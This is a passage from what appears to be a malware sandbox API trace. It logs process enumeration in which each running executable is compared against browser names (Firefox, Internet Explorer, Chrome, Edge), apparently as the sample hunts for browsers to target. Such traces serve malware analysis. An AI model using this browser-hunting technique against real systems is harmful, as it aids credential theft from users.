pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.181] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.181] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.181] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.181] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.181] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.181] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.181] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.182] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.182] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.182] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.182] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.182] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.182] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.182] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.182] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.183] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.183] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.183] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.183] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.183] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0193.183] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0193.183] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0193.183] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0193.183] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.183] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.184] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.184] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.184] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.184] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.184] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.185] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.185] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.185] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.185] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.185] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0193.185] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0193.185] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0193.185] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0193.185] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.185] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0193.186] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0193.186] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0193.186] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0193.186] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.186] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0193.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0193.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0193.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0193.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.186] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.187] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.187] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.187] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.187] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.187] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0193.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0193.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0193.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0193.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.187] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0193.188] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0193.188] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0193.188] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0193.188] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.188] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0193.188] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0193.189] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0193.189] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0193.189] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.189] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0193.189] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0193.189] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0193.189] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0193.189] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.189] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0193.190] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0193.190] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0193.190] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0193.190] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.190] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0193.190] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0193.190] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0193.190] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0193.190] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.190] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0193.191] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0193.191] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0193.191] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0193.191] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.191] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0193.191] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0193.191] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0193.191] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0193.191] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.191] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0193.192] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0193.192] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0193.192] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0193.192] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.192] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0193.192] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0193.193] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0193.193] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0193.193] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.193] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0193.193] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0193.193] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0193.193] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0193.193] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.193] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0193.194] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0193.194] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0193.194] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0193.194] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.194] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0193.194] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0193.194] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0193.194] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0193.194] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.194] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0193.195] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0193.195] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0193.195] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0193.195] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.195] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0193.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0193.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0193.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0193.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.195] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0193.196] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0193.196] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0193.196] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0193.196] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.196] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0193.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0193.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0193.197] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0193.197] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.197] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0193.197] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0193.197] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0193.197] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0193.197] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.197] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0193.198] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0193.198] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0193.198] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0193.198] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.198] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0193.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0193.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0193.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0193.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.198] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0193.201] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0193.201] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0193.201] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0193.201] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.201] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0193.201] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0193.201] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0193.201] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0193.201] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.201] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.202] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0193.202] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0193.202] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0193.202] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.202] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.202] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.202] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.202] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.202] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.202] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0193.203] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0193.203] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0193.203] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0193.203] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.203] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.203] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.203] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.204] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.204] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.204] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0193.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0193.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0193.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0193.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.204] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.205] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.205] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.205] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.205] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.205] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.205] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.205] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.205] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.205] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.205] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0193.206] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0193.206] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0193.206] lstrcmpiA (lpString1="taskeng.exe", 